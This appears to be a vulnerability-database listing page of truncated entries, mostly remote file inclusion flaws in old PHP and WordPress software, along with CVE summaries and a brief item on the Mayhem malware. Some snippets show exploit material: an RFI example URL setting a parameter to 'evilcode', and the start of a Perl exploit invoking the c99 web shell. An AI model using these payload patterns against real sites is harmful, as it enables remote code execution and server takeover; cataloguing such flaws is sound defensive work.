CVE-2021-24472

The OnAir2 WordPress theme before 3.9.9.2 and QT KenthaRadio WordPress plugin before 2.0.2 have exposed proxy functionality to unauthenticated users, sending requests to this proxy functionality will have the web server fetch and display the content from any URI, this would allow for SSRF Server...

CVE-2024-4498 Path Traversal and RFI Vulnerability in parisneo/lollms-webui

A Path Traversal and Remote File Inclusion RFI vulnerability exists in the parisneo/lollms-webui application, affecting versions v9.7 to the latest. The vulnerability arises from insufficient input validation in the /applysettings function, allowing an attacker to manipulate the discussiondbname...

CVE-2024-20405

A vulnerability in the web-based management interface of Cisco Finesse could allow an unauthenticated, remote attacker to conduct a stored XSS attack by exploiting an RFI vulnerability. This vulnerability is due to insufficient validation of user-supplied input for specific HTTP requests that are...

CVE-2024-20405

A vulnerability in the web-based management interface of Cisco Finesse could allow an unauthenticated, remote attacker to conduct a stored XSS attack by exploiting an RFI vulnerability. This vulnerability is due to insufficient validation of user-supplied input for specific HTTP requests that are...

Exploit for CVE-2023-3452

CVE-2023-3452-PoC - Wordpress Plugin Canto 3.0.5 - Remote...

WordPress Gwolle Guestbook Plugin < 1.5.4 RFI Vulnerability

The WordPress plugin SPDX-FileCopyrightText: 2017 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only if description scriptoid"1.3.6.1.4.1.25623.1.0.112042";...

WordPress LoginWall Plugin Remote File Inclusion

A Remote File Inclusion vulnerability exists in WordPress LoginWall Plugin. Successful exploitation of this vulnerability would allow a non-authenticated attacker to include remote files and execute arbitrary code on the vulnerable system...

Mayhem — A New Malware Targets Linux and FreeBSD Web Servers

Security researchers from Russian Internet giant Yandex have discovered a new piece of malware that is being used to target Linux and FreeBSD web servers in order to make them a part of the wide botnet, even without the need of any root privileges. Researchers dubbed the malware as Mayhem, a nast...

FestOs <= 2.2.1 - Multiple RFI Exploit

No description provided by source. Exploit Title: FestOs = 2.2.1 Multiple RFI Exploit Date: 19-12-2009 Author: cr4wl3r Software Link: http://code.google.com/p/festos/downloads/list Version: N/A Tested on: GNU/LINUX Code : reportsplacement.php ?php $title = Jury Sheet Report;...

ezContents 2.0.3 showguestbook.php GLOBALS[admin_home] Parameter Remote File Inclusion

No description provided by source. source: http://www.securityfocus.com/bid/19776/info ezContents is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker can exploit these issues to include an arbitrary remote fi...

Xt-Stats 2.4.0.b3 (server_base_dir) - Remote File Include (RFI) Vulnerability

No description provided by source. Download:http://www.xt-scripts.com/index.php?dl=32 Finded by ThE dE@Th Greetz For :AsB-May Team & HaCk.eGy xtcounter.php: require $serverbasedir.'management/sources/counterclass.php'; http://www.site.com/path/xtcounter.php?serverbasedir=evilcode milw0rm.com...

ea-gBook 0.1 - Remote Command Execution with RFI (c99) Exploit

No description provided by source. !/usr/bin/perl ea-gBook 0.1 Remote Command Execution with RFI c99 Exploit Vendor: http://ea-style.de/ Download: http://ea-style.de/eddy/index.php?action=downgbookagb Author: bd0rk Contact: bd0rkathackermail.com site: http://www.soh-crew.it.tt thanks Joss for the...

Mp3 Online Id Tag Editor RFI Vulnerability

No description provided by source...

UBB Threads 6.0 - RFI Vulnerability

No description provided by source...

HowMany 2.6 - RFI Vulnerability

No description provided by source...

php classifieds 7.3 - Remote File Inclusion Vulnerability

No description provided by source. ================================== PHP Classifieds v7.3 RFI Vulnerability ================================== ==================================================== x ExpL0it TitLe : PHP Classifieds v7.3 RFI Vulnerability x DatE : 09 September 2010 x AutH0r : alsa7...

SaphpLesson 4.0 food RFI Vulnerability

No description provided by source...

Sonium Enterprise Adressbook <= 0.2 (folder) Include Vulnerability

No description provided by source. +-------------------------------------------------------------------- + + Sonium Enterprise Adressbook Version 0.2 folder RFI + + Original advisory: + http://www.bb-pcsecurity.de/Websecurity/342/org/SoniumEnterpriseAdressbookVersion0.2folderRFI.htm +...

Gallery 2.3 - RFI Vulnerability

No description provided by source...

Joomla Component OnlineFlashQuiz <= 1.0.2 RFI Vulnerability

No description provided by source. /==============================================================================================================\ | | | o Online FlashQuiz 1.0.2 Remote File Inclusion Vulnerability | | | | Software : comonlineflashquiz version 1.0.2 - paid component | | Developer...